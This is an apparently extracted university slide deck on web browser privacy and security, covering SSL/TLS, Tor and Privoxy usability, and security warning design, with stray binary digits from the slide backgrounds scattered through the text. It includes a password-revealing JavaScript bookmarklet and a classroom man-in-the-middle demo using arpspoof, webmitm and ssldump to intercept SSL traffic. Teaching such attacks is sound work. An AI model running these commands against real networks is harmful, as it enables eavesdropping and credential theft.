1 1 1 0 0 0 0 1 1 0 1 1 1 1 0 1 1 0 1 1 0 1 1 0 0 1 1 1 1 0 0 1 1 1 1 1 1 1 1 1 0 1 1 0 1 0 1 1 1 1 1 0 1 1 0 Web Browser Privacy and Security 1 0 1 1 0 Dhruv Mohindra (MSISPM) Usable Privacy Security, Spring 08 1 1 1 0 0 0 1 1 1 1 1 1 1 1 1 0 0 1 1 1 1 1 1 0 1 1 0 0 1 0 1 1 1 1 1 0 0 0 1 1 1 1 1 1 0 1 1 0 1 0 0 Agenda Web Browsing and 'The User' Technology Overview Security Concerns Privacy Matters 0 Recent Developments 1 Suggestions 1 1 1 1 1 0 0 0 1 1 1 1 1 1 Agenda Web Browsing and 'The User' Technology Overview 1 1 1 1 1 0 0 1 1 1 1 0 1 1 0 0 1 1 1 1 1 0 0 0 1 1 1 1 1 1 0 1 1 0 1 0 0 1 Security Concerns 1 Privacy Matters Recent Developments Suggestions 0 1 0 1 1 1 1 0 0 0 1 1 1 1 1 1 1 1 1 1 1 0 0 1 1 1 1 0 1 1 0 0 1 1 1 1 1 0 0 0 1 1 1 1 1 1 0 1 1 0 1 0 A Model For Informed Consent 0 1 1 0 1 0 1 Source: Informed Consent by Design(Friedman, Lin, Miller) 1 1 1 0 0 0 1 1 1 1 1 1 1 1 1 0 0 1 1 1 1 1 1 0 1 1 0 0 0 1 0 1 1 1 1 1 0 0 0 1 1 1 1 1 1 0 1 1 0 1 0 0 1 1 1 Agreement Revisited... 1 1 1 0 0 0 1 1 1 1 1 1 1 1 1 1 1 0 0 1 1 1 1 0 1 1 0 0 1 1 1 1 1 0 0 0 1 1 1 1 1 1 0 1 1 0 1 0 0 1 1 0 1 0 1 On the other hand... 1 1 1 0 0 0 1 1 1 1 1 1 1 1 1 1 1 0 0 1 1 1 1 0 1 1 0 0 1 1 1 1 1 0 0 0 1 1 1 1 1 1 0 1 1 0 1 0 0 1 But with Web Browsers... None of the approaches work - One is too intrusive, the other too lax It is a good idea to reveal simple and required features - The vast population just wants to browse the Internet 1 0 - Expose tutorials and links so that others are satisfied 1 0 1 Hide complexity underneath, advanced users can find it Strike a trade-off between security and usability - Recovering Stored Passwords in Firefox 1 1 1 0 0 0 1 1 1 1 1 1 1 1 1 0 0 1 1 1 1 1 1 0 1 1 0 0 0 1 0 1 1 1 1 1 0 0 0 1 1 1 1 1 1 0 1 1 0 1 0 0 1 1 1 Towards Better Usability... Javascript:( function() { var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There are no passwords in forms on this page."); } )(); 1 1 1 0 0 0 1 1 1 1 1 1 1 1 1 0 0 1 1 1 1 1 1 0 1 1 0 0 1 0 1 1 1 1 1 0 0 0 1 1 1 1 1 1 0 1 1 0 1 0 0 Agenda Web Browsing and 'The User' Technology Overview Security Concerns Privacy Matters 0 Recent Developments 1 Suggestions 1 1 1 1 1 0 0 0 1 1 1 1 1 1 1 1 1 0 0 1 1 1 1 1 1 0 1 1 0 0 0 1 0 1 1 1 1 1 0 0 0 1 1 1 1 1 1 0 1 1 0 1 0 Secure Sockets Layer (SSL/TLS) • Set of cryptographic protocols that provide secure communications on the Internet, for applications 0 • Designed to protect from eavesdropping, tampering, replay and packet forgery. 1 • SSL/TLS Implementations do not signify secure “places” but security in 'transit'. 1 1 Image Source: http://www.windowsitpro.com 1 1 1 0 0 0 1 1 1 1 1 1 Agenda Web Browsing and 'The User' Technology Overview 1 1 1 1 1 0 0 1 1 1 1 0 1 1 0 0 1 1 1 1 1 0 0 0 1 1 1 1 1 1 0 1 1 0 1 0 0 1 Security Concerns 1 Privacy Matters Recent Developments Suggestions 0 1 0 1 1 1 1 0 0 0 1 1 1 1 1 1 Exercise 1 1 1 0 0 1 1 1 1 1 1 0 1 1 0 0 0 1 0 1 1 1 1 1 0 0 0 1 1 1 1 1 1 0 1 1 0 1 0 How many people feel that they are safe while browsing non TLS(SSL)-enabled websites? 0 1 1 1 Have you every questioned someone about how SSL works and how you are safe with it? Or do you take technology for granted because everyone says “Use SSL to browse securely”? 1 1 1 0 0 0 1 1 1 1 1 1 1 1 1 1 1 0 0 1 1 1 1 0 1 1 0 0 1 1 1 1 1 0 0 0 1 1 1 1 1 1 0 1 1 0 1 0 0 1 1 0 1 0 1 Demonstration 1 1 1 0 0 0 1 1 1 1 1 1 1 1 1 1 1 0 0 1 1 1 1 0 1 1 0 0 1 1 1 1 1 0 0 0 1 1 1 1 1 1 0 1 1 0 1 0 Man-in-the-middle Attack 0 1 1 0 1 0 1 Source: http://www.acm.org/crossroads/xrds11-1/gfx/figure2-wifi.jpg 1 1 1 0 0 0 1 1 1 1 1 1 Man-in-the-middle Attack 1 1 1 0 0 1 1 1 1 1 1 0 1 1 0 0 0 1 0 1 1 1 1 1 0 0 0 1 1 1 1 1 1 0 1 1 0 1 0 0 1 1 SSL/TLS can be defeated with Social Engineering Run the following commands (with permission)- $ arpspoof -t victim gateway - $ arpspoof -t gateway victim - $ echo 1 > /proc/sys/net/ipv4/ip_forward - $ wireshark - $ webmitm -dd - $ ssldump -n -d -k webmitm.crt | tee ssldump.log 1 Where, victim is the IP address of the victim computer gateway is the IP address of the gateway (arpspoof utility comes with the dsniff package) 1 1 1 0 0 0 1 1 1 1 1 1 1 1 1 0 0 1 1 1 1 1 1 0 1 1 0 0 1 0 1 1 1 1 1 0 0 0 1 1 1 1 1 1 0 1 1 0 1 0 0 Agenda Web Browsing and 'The User' Technology Overview Security Concerns Privacy Matters 0 Recent Developments 1 Suggestions 1 1 1 1 1 0 0 0 1 1 1 1 1 1 1 1 1 0 0 1 1 1 1 1 1 0 1 1 0 0 0 1 0 1 1 1 1 1 0 0 0 1 1 1 1 1 1 0 1 1 0 1 0 Anonymous Browsing - Hiding the IP address - Disabling exchange of cookies - Other personally identifiable information 0 1 1 1 What constitutes anonymity on the Internet? TOR (The Onion Router) - Routes traffic through three mix proxies by default - The sender encrypts a message thrice - Due to layered encryption, it is called Onion Routing - You are safer as long people in your anonymity set are non-identifiable - TOR is a SOCKS proxy and thus requires Privoxy - Privoxy handles http, https data and DNS lookups then passes traffic to TOR via a SOCKS connection 1 1 1 0 0 0 1 1 1 1 1 1 1 1 1 1 1 0 0 1 1 1 1 0 1 1 0 0 1 1 1 1 1 0 0 0 1 1 1 1 1 1 0 1 1 0 1 0 0 1 1 0 1 0 1 TOR Caveats False sense of completion - Sometimes users mistakenly feel protected while they are not Using TOR without Privoxy - Configuring a browser to use TOR as its SOCKS proxy doesn't work due to DNS lookups/leaks Execution of Client-side code - Enabling Java, Javascript, Flash or ActiveX is very dangerous. At first glance the whole system is difficult to grasp - No clear description of how tor, Vidalia, Privoxy work - No clear message that Privoxy is to run on port 8118 while TOR on 9050 (useful when configuring browser) 1 1 1 0 0 0 1 1 1 1 1 1 1 1 1 0 0 1 1 1 1 1 1 0 1 1 0 0 0 1 0 1 1 1 1 1 0 0 0 1 1 1 1 1 1 0 1 1 0 1 0 FoxTor on Linux Firefox extension using the web browser. 0 1 1 1 TOR, Privoxy and FoxTor installed gracefully - Compiled source packages as usual and installed the Configuration of Privoxy was tricky - “forward-socks4a / 127.0.0.1:9050 .”, line had to be added in /etc/privoxy/config. Not mentioned in docs. - It would be nice to have FoxTor's 'help' have these descriptions Runtime Issues - FoxTor continues to say “You are now Masked” even when one has turned off either Privoxy or tor. - The user may not realize the real source of the problem and may try fiddling with FoxTor instead 1 1 1 0 0 0 1 1 1 1 1 1 1 1 1 0 0 1 1 1 1 1 1 0 1 1 0 0 1 0 1 1 1 1 1 0 0 0 1 1 1 1 1 1 0 1 1 0 1 0 0 Agenda Web Browsing and 'The User' Technology Overview Security Concerns Privacy Matters 0 Recent Developments 1 Suggestions 1 1 1 1 1 0 0 0 1 1 1 1 1 1 1 1 1 1 1 0 0 1 1 1 1 0 1 1 0 0 1 1 1 1 1 0 0 0 1 1 1 1 1 1 0 1 1 0 1 0 0 1 1 0 1 0 1 Recent Developments Context Sensitive Certificate Verification - Clarify relationship between user and server - Uses tokens and modifies web browsers - Displays a series of alert boxes...complicated? - Do you have information on removable media? - Are you internal member of Org. that owns server? - Doesn't help avoid dangers with public websites - Denial of Service Specific Password Warnings - Alert user while sending unencrypted passwords - Series of confirmation windows again... - User Study participants are more careful when you tell them “Do not visit websites you consider too risky” 1 1 1 0 0 0 1 1 1 1 1 1 Agenda Web Browsing and 'The User' Technology Overview 1 1 1 1 1 0 0 1 1 1 1 0 1 1 0 0 1 1 1 1 1 0 0 0 1 1 1 1 1 1 0 1 1 0 1 0 0 1 Security Concerns 1 Privacy Matters Recent Developments Suggestions 0 1 0 1 1 1 1 0 0 0 1 1 1 1 1 1 1 1 1 1 1 0 0 1 1 1 1 0 1 1 0 0 1 1 1 1 1 0 0 0 1 1 1 1 1 1 0 1 1 0 1 0 0 1 1 0 1 0 1 Context Sensitive Dialog Boxes 1 1 1 0 0 0 1 1 1 1 1 1 1 1 1 0 0 1 1 1 1 1 1 0 1 1 0 0 0 1 0 1 1 1 1 1 - Conveys the initial meaning without any verbose statements 0 0 0 - Tailor according to skill set of user, ask at browser installation time 1 1 1 - Change images while adapting to user's daily usage and preferences 1 1 1 0 1 1 0 1 0 Context Sensitive Dialog Boxes 0 1 1 1 - Covey application or website specific risk - More intuitive and easy to understand - Users can click 'x' to dismiss anytime - 'Learn More' is default, curious users will click at first instinct 1 1 1 0 0 0 1 1 1 1 1 1 1 1 1 0 0 1 1 1 1 1 1 0 1 1 0 0 0 1 0 1 1 1 1 1 0 0 0 1 1 1 1 1 1 0 1 1 0 1 0 0 1 1 1 Conclusion 1 1 1 0 0 0 1 1 1 1 1 1 1 1 1 0 0 1 1 1 1 1 1 0 1 1 0 0 0 1 0 1 1 1 1 1 0 0 0 1 1 1 1 1 1 0 1 1 0 1 0 0 1 1 1 Questions